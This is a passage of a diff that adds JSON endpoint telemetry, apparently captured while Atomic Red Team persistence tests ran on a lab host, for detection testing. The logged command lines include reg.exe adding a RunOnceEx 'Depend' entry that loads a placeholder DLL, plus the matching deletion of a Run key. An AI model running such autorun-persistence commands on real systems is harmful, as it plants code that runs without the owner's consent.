"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_value": "Run", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "registry", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team", + "registry_value": "Atomic Red Team", + "timestamp": 131883570852770000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "process", + "pid": 6156, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" + }, + { + "event_type": "file", + "file_name": "REG.EXE-26976709.pf", + "file_path": "C:\\Windows\\Prefetch\\REG.EXE-26976709.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2888, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570853020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570852930000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "command_line": "REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5688, + "ppid": 2888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570853120000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "registry", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team", + "registry_value": "Atomic Red Team", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "process", + "pid": 5688, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" + }, + { + "event_type": "process", + "pid": 2888, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570853080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2580, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570853310000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853240000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "event_type": "process", + "pid": 2580, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570853400000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5084, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570853980000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853860000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853860000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853860000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570853860000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "command_line": "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7008, + "ppid": 5084, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570854120000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "registry", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", + "registry_value": "Depend", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "registry", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend\\1", + "registry_value": "1", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "process", + "pid": 7008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" + }, + { + "event_type": "process", + "pid": 5084, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570854180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3792, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "command_line": "REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1484, + "ppid": 3792, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570854459984, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854330000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + 